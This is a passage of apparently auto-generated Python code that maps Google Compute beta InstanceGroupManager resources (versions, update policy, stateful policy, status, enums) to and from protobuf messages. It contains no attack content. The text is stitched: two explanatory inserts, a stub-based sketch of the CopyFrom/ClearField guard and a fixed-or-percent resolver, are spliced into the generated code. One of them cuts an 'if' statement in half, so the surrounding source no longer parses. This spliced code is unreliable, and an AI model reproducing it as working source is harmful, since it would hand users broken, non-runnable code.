resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerVersions()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.instance_template):\n res.instance_template = Primitive.to_proto(resource.instance_template)\n if 
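Message-typed fields throughout these converters are set with one recurring guard: CopyFrom when the nested to_proto produced a message, ClearField otherwise, so an unset Python attribute maps to an explicitly cleared proto field instead of a stale default. A stand-alone sketch of that guard with hypothetical message stubs (the real code relies on the protobuf-generated CopyFrom/ClearField methods):

class TargetSizeStub:
    """Hypothetical stand-in for a pb2 target-size message."""
    def __init__(self, fixed=None):
        self.fixed = fixed
    def CopyFrom(self, other):
        self.fixed = other.fixed

class VersionsStub:
    """Hypothetical stand-in for a pb2 versions message."""
    def __init__(self):
        self.target_size = TargetSizeStub()
    def ClearField(self, name):
        setattr(self, name, TargetSizeStub())

def set_target_size(res, nested):
    # mirrors the CopyFrom/ClearField guard used by the generated converters
    if nested:
        res.target_size.CopyFrom(nested)
    else:
        res.ClearField("target_size")
    return res

assert set_target_size(VersionsStub(), TargetSizeStub(fixed=5)).target_size.fixed == 5
assert set_target_size(VersionsStub(), None).target_size.fixed is None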
InstanceGroupManagerVersionsTargetSize.to_proto(resource.target_size):\n res.target_size.CopyFrom(\n InstanceGroupManagerVersionsTargetSize.to_proto(resource.target_size)\n )\n else:\n res.ClearField(\"target_size\")\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerVersions(\n name=Primitive.from_proto(resource.name),\n instance_template=Primitive.from_proto(resource.instance_template),\n target_size=InstanceGroupManagerVersionsTargetSize.from_proto(\n resource.target_size\n ),\n )\n\n\nclass InstanceGroupManagerVersionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerVersions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerVersions.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerVersionsTargetSize(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerVersionsTargetSize()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerVersionsTargetSize(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerVersionsTargetSizeArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerVersionsTargetSize.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerVersionsTargetSize.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerCurrentActions(object):\n def __init__(\n self,\n none: int = None,\n creating: int = None,\n creating_without_retries: int = None,\n verifying: int = None,\n recreating: int = None,\n deleting: int = None,\n abandoning: int = None,\n restarting: int = None,\n refreshing: int = None,\n ):\n self.none = none\n self.creating = creating\n self.creating_without_retries = creating_without_retries\n self.verifying = verifying\n self.recreating = recreating\n self.deleting = deleting\n self.abandoning = abandoning\n self.restarting = restarting\n self.refreshing = refreshing\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerCurrentActions()\n if Primitive.to_proto(resource.none):\n res.none = Primitive.to_proto(resource.none)\n if Primitive.to_proto(resource.creating):\n res.creating = Primitive.to_proto(resource.creating)\n if Primitive.to_proto(resource.creating_without_retries):\n res.creating_without_retries = Primitive.to_proto(\n resource.creating_without_retries\n )\n if Primitive.to_proto(resource.verifying):\n res.verifying = Primitive.to_proto(resource.verifying)\n if Primitive.to_proto(resource.recreating):\n res.recreating = 
Primitive.to_proto(resource.recreating)\n if Primitive.to_proto(resource.deleting):\n res.deleting = Primitive.to_proto(resource.deleting)\n if Primitive.to_proto(resource.abandoning):\n res.abandoning = Primitive.to_proto(resource.abandoning)\n if Primitive.to_proto(resource.restarting):\n res.restarting = Primitive.to_proto(resource.restarting)\n if Primitive.to_proto(resource.refreshing):\n res.refreshing = Primitive.to_proto(resource.refreshing)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerCurrentActions(\n none=Primitive.from_proto(resource.none),\n creating=Primitive.from_proto(resource.creating),\n creating_without_retries=Primitive.from_proto(\n resource.creating_without_retries\n ),\n verifying=Primitive.from_proto(resource.verifying),\n recreating=Primitive.from_proto(resource.recreating),\n deleting=Primitive.from_proto(resource.deleting),\n abandoning=Primitive.from_proto(resource.abandoning),\n restarting=Primitive.from_proto(resource.restarting),\n refreshing=Primitive.from_proto(resource.refreshing),\n )\n\n\nclass InstanceGroupManagerCurrentActionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerCurrentActions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerCurrentActions.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatus(object):\n def __init__(\n self,\n is_stable: bool = None,\n version_target: dict = None,\n stateful: dict = None,\n autoscaler: str = None,\n ):\n self.is_stable = is_stable\n self.version_target = version_target\n self.stateful = stateful\n self.autoscaler = autoscaler\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatus()\n if Primitive.to_proto(resource.is_stable):\n res.is_stable = Primitive.to_proto(resource.is_stable)\n if InstanceGroupManagerStatusVersionTarget.to_proto(resource.version_target):\n res.version_target.CopyFrom(\n InstanceGroupManagerStatusVersionTarget.to_proto(\n resource.version_target\n )\n )\n else:\n res.ClearField(\"version_target\")\n if InstanceGroupManagerStatusStateful.to_proto(resource.stateful):\n res.stateful.CopyFrom(\n InstanceGroupManagerStatusStateful.to_proto(resource.stateful)\n )\n else:\n res.ClearField(\"stateful\")\n if Primitive.to_proto(resource.autoscaler):\n res.autoscaler = Primitive.to_proto(resource.autoscaler)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatus(\n is_stable=Primitive.from_proto(resource.is_stable),\n version_target=InstanceGroupManagerStatusVersionTarget.from_proto(\n resource.version_target\n ),\n stateful=InstanceGroupManagerStatusStateful.from_proto(resource.stateful),\n autoscaler=Primitive.from_proto(resource.autoscaler),\n )\n\n\nclass InstanceGroupManagerStatusArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatus.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatus.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatusVersionTarget(object):\n def __init__(self, is_reached: bool = None):\n self.is_reached = is_reached\n\n @classmethod\n def to_proto(self, resource):\n if not 
resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusVersionTarget()\n )\n if Primitive.to_proto(resource.is_reached):\n res.is_reached = Primitive.to_proto(resource.is_reached)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusVersionTarget(\n is_reached=Primitive.from_proto(resource.is_reached),\n )\n\n\nclass InstanceGroupManagerStatusVersionTargetArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatusVersionTarget.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatusVersionTarget.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerStatusStateful(object):\n def __init__(\n self,\n has_stateful_config: bool = None,\n per_instance_configs: dict = None,\n is_stateful: bool = None,\n ):\n self.has_stateful_config = has_stateful_config\n self.per_instance_configs = per_instance_configs\n self.is_stateful = is_stateful\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusStateful()\n if Primitive.to_proto(resource.has_stateful_config):\n res.has_stateful_config = Primitive.to_proto(resource.has_stateful_config)\n if InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(\n resource.per_instance_configs\n ):\n res.per_instance_configs.CopyFrom(\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(\n resource.per_instance_configs\n )\n )\n else:\n res.ClearField(\"per_instance_configs\")\n if Primitive.to_proto(resource.is_stateful):\n res.is_stateful = Primitive.to_proto(resource.is_stateful)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusStateful(\n has_stateful_config=Primitive.from_proto(resource.has_stateful_config),\n per_instance_configs=InstanceGroupManagerStatusStatefulPerInstanceConfigs.from_proto(\n resource.per_instance_configs\n ),\n is_stateful=Primitive.from_proto(resource.is_stateful),\n )\n\n\nclass InstanceGroupManagerStatusStatefulArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatusStateful.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatusStateful.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatusStatefulPerInstanceConfigs(object):\n def __init__(self, all_effective: bool = None):\n self.all_effective = all_effective\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusStatefulPerInstanceConfigs()\n )\n if Primitive.to_proto(resource.all_effective):\n res.all_effective = Primitive.to_proto(resource.all_effective)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusStatefulPerInstanceConfigs(\n all_effective=Primitive.from_proto(resource.all_effective),\n )\n\n\nclass InstanceGroupManagerStatusStatefulPerInstanceConfigsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(i)\n for i in 
resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerAutoHealingPolicies(object):\n def __init__(self, health_check: str = None, initial_delay_sec: int = None):\n self.health_check = health_check\n self.initial_delay_sec = initial_delay_sec\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerAutoHealingPolicies()\n )\n if Primitive.to_proto(resource.health_check):\n res.health_check = Primitive.to_proto(resource.health_check)\n if Primitive.to_proto(resource.initial_delay_sec):\n res.initial_delay_sec = Primitive.to_proto(resource.initial_delay_sec)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerAutoHealingPolicies(\n health_check=Primitive.from_proto(resource.health_check),\n initial_delay_sec=Primitive.from_proto(resource.initial_delay_sec),\n )\n\n\nclass InstanceGroupManagerAutoHealingPoliciesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerAutoHealingPolicies.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerAutoHealingPolicies.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerUpdatePolicy(object):\n def __init__(\n self,\n type: str = None,\n instance_redistribution_type: str = None,\n minimal_action: str = None,\n max_surge: dict = None,\n max_unavailable: dict = None,\n replacement_method: str = None,\n most_disruptive_allowed_action: str = None,\n min_ready_sec: int = None,\n ):\n self.type = type\n self.instance_redistribution_type = instance_redistribution_type\n self.minimal_action = minimal_action\n self.max_surge = max_surge\n self.max_unavailable = max_unavailable\n self.replacement_method = replacement_method\n self.most_disruptive_allowed_action = most_disruptive_allowed_action\n self.min_ready_sec = min_ready_sec\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicy()\n if InstanceGroupManagerUpdatePolicyTypeEnum.to_proto(resource.type):\n res.type = InstanceGroupManagerUpdatePolicyTypeEnum.to_proto(resource.type)\n if InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.to_proto(\n resource.instance_redistribution_type\n ):\n res.instance_redistribution_type = (\n InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.to_proto(\n resource.instance_redistribution_type\n )\n )\n if InstanceGroupManagerUpdatePolicyMinimalActionEnum.to_proto(\n resource.minimal_action\n ):\n res.minimal_action = (\n InstanceGroupManagerUpdatePolicyMinimalActionEnum.to_proto(\n resource.minimal_action\n )\n )\n if InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(resource.max_surge):\n res.max_surge.CopyFrom(\n InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(resource.max_surge)\n )\n else:\n res.ClearField(\"max_surge\")\n if InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(\n resource.max_unavailable\n ):\n res.max_unavailable.CopyFrom(\n InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(\n resource.max_unavailable\n )\n )\n else:\n res.ClearField(\"max_unavailable\")\n if InstanceGroupManagerUpdatePolicyReplacementMethodEnum.to_proto(\n 
resource.replacement_method\n ):\n res.replacement_method = (\n InstanceGroupManagerUpdatePolicyReplacementMethodEnum.to_proto(\n resource.replacement_method\n )\n )\n if InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.to_proto(\n resource.most_disruptive_allowed_action\n ):\n res.most_disruptive_allowed_action = InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.to_proto(\n resource.most_disruptive_allowed_action\n )\n if Primitive.to_proto(resource.min_ready_sec):\n res.min_ready_sec = Primitive.to_proto(resource.min_ready_sec)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicy(\n type=InstanceGroupManagerUpdatePolicyTypeEnum.from_proto(resource.type),\n instance_redistribution_type=InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.from_proto(\n resource.instance_redistribution_type\n ),\n minimal_action=InstanceGroupManagerUpdatePolicyMinimalActionEnum.from_proto(\n resource.minimal_action\n ),\n max_surge=InstanceGroupManagerUpdatePolicyMaxSurge.from_proto(\n resource.max_surge\n ),\n max_unavailable=InstanceGroupManagerUpdatePolicyMaxUnavailable.from_proto(\n resource.max_unavailable\n ),\n replacement_method=InstanceGroupManagerUpdatePolicyReplacementMethodEnum.from_proto(\n resource.replacement_method\n ),\n most_disruptive_allowed_action=InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.from_proto(\n resource.most_disruptive_allowed_action\n ),\n min_ready_sec=Primitive.from_proto(resource.min_ready_sec),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerUpdatePolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerUpdatePolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerUpdatePolicyMaxSurge(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMaxSurge()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicyMaxSurge(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyMaxSurgeArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerUpdatePolicyMaxSurge.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMaxUnavailable(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n 
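VersionsTargetSize, UpdatePolicyMaxSurge and UpdatePolicyMaxUnavailable above all carry the same trio of fields: the caller supplies either an absolute fixed count or a percent, and the service reports back the resulting calculated absolute value. A small hedged sketch of how such a fixed-or-percent value might be resolved client-side (resolve_count and its ceiling rounding are illustrative, not part of the generated API):

def resolve_count(group_size, fixed=None, percent=None):
    """Resolve a fixed-or-percent setting against an instance group size."""
    if fixed is not None:
        return fixed
    if percent is not None:
        # round up, so a non-zero percent never resolves to zero instances
        return -(-group_size * percent // 100)
    raise ValueError("either fixed or percent must be set")

assert resolve_count(10, fixed=3) == 3
assert resolve_count(10, percent=25) == 3   # ceil(2.5)
assert resolve_count(10, percent=0) == 0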
@classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMaxUnavailable()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicyMaxUnavailable(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyMaxUnavailableArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerUpdatePolicyMaxUnavailable.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerNamedPorts(object):\n def __init__(self, name: str = None, port: int = None):\n self.name = name\n self.port = port\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerNamedPorts()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.port):\n res.port = Primitive.to_proto(resource.port)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerNamedPorts(\n name=Primitive.from_proto(resource.name),\n port=Primitive.from_proto(resource.port),\n )\n\n\nclass InstanceGroupManagerNamedPortsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerNamedPorts.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerNamedPorts.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatefulPolicy(object):\n def __init__(self, preserved_state: dict = None):\n self.preserved_state = preserved_state\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicy()\n if InstanceGroupManagerStatefulPolicyPreservedState.to_proto(\n resource.preserved_state\n ):\n res.preserved_state.CopyFrom(\n InstanceGroupManagerStatefulPolicyPreservedState.to_proto(\n resource.preserved_state\n )\n )\n else:\n res.ClearField(\"preserved_state\")\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicy(\n preserved_state=InstanceGroupManagerStatefulPolicyPreservedState.from_proto(\n resource.preserved_state\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatefulPolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatefulPolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedState(object):\n def __init__(\n self, disks: 
dict = None, internal_ips: dict = None, external_ips: dict = None\n ):\n self.disks = disks\n self.internal_ips = internal_ips\n self.external_ips = external_ips\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedState()\n )\n if Primitive.to_proto(resource.disks):\n res.disks = Primitive.to_proto(resource.disks)\n if Primitive.to_proto(resource.internal_ips):\n res.internal_ips = Primitive.to_proto(resource.internal_ips)\n if Primitive.to_proto(resource.external_ips):\n res.external_ips = Primitive.to_proto(resource.external_ips)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedState(\n disks=Primitive.from_proto(resource.disks),\n internal_ips=Primitive.from_proto(resource.internal_ips),\n external_ips=Primitive.from_proto(resource.external_ips),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedState.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedState.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisks(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateDisks()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateDisks(\n auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateDisksAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateDisksArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateDisks.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateDisks.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIps(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateInternalIps()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateInternalIps(\n 
auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateInternalIpsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateInternalIps.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateInternalIps.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIps(object):\n def __init__(self, auto_delete: str = None):\n self.auto_delete = auto_delete\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicyPreservedStateExternalIps()\n )\n if InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n ):\n res.auto_delete = InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.to_proto(\n resource.auto_delete\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatefulPolicyPreservedStateExternalIps(\n auto_delete=InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsAutoDeleteEnum.from_proto(\n resource.auto_delete\n ),\n )\n\n\nclass InstanceGroupManagerStatefulPolicyPreservedStateExternalIpsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateExternalIps.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatefulPolicyPreservedStateExternalIps.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerDistributionPolicyTargetShapeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum.Value(\n \"ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerDistributionPolicyTargetShapeEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyTypeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyTypeEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum%s\"\n % resource\n )\n\n 
@classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.Name(\n resource\n )[\n len(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum\"\n ) :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMinimalActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyMinimalActionEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyReplacementMethodEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum.Name(\n resource\n )[\n len(\"ComputeBetaInstanceGroupManagerUpdatePolicyReplacementMethodEnum\") :\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.Value(\n \"ComputeBetaInstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum%s\"\n % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return 